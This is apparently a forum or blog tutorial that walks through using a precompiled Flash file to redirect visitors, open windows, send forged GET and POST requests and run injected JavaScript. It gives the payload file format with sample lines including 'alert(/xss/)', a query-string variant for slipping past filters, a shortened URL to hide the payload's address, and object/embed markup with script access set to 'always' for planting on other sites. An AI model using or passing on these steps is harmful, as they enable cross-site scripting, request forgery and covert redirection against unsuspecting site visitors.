Hello everyone sorry for my absencebut i had lot stuff to do.
today i talk about Jump/XSS/CSRF in Flash.
The point of this tutorial is about build a redirect with flash jump
For the start we need to use a precompiled swf
we have to upload the swf file to a webserver i had used altervista.org for it
than we have to make a file txt with the same name of the swf like test.swf and test.txt
now we have to edit the txt file
this are example of the edit of file .txt
jump to http://drunkgeisha.noblogs.org
0,http://drunkgeisha.noblogs.org
open window to http://drunkgeisha.noblogs.org
1,http://drunkgeisha.noblogs.org
send GET Request to drunkgeisha.altervista.org
2,http://drunkgeisha.altervista.org/?hello
send POST Request to drunkgeisha.altervista.org
3,http://drunkgeisha.altervista.org/?hello,,,str=string
Call JavaScript
4,alert(/xss/)
now you have to try it
for do it you need only to write in the browser
test.swf?sec80=http://yoursite/test.txt
this string may be better for bypass some filter
test.swf?sec80=http://yoursite/test.txt&80sec.swf
if everythings is correct you can see this
now you have to embed it on some page
i have used tinyurl for obscure better the url http://tinyurl.com/yhh5x7l = http://drunkgeisha.altervista.org/prova.swf?sec80=http://drunkgeisha.altervista.org/prova.txt
<object width="425" height="344"><param name="movie" value="http://tinyurl.com/yhh5x7l"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://tinyurl.com/yhh5x7l" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object>
the result is this
http://drunkgeisha.altervista.org/index.html
and this on blogspot
sorry for the bad quality but is my first tutorial video
http://www.youtube.com/watch?v=ZE8gUY3uIIk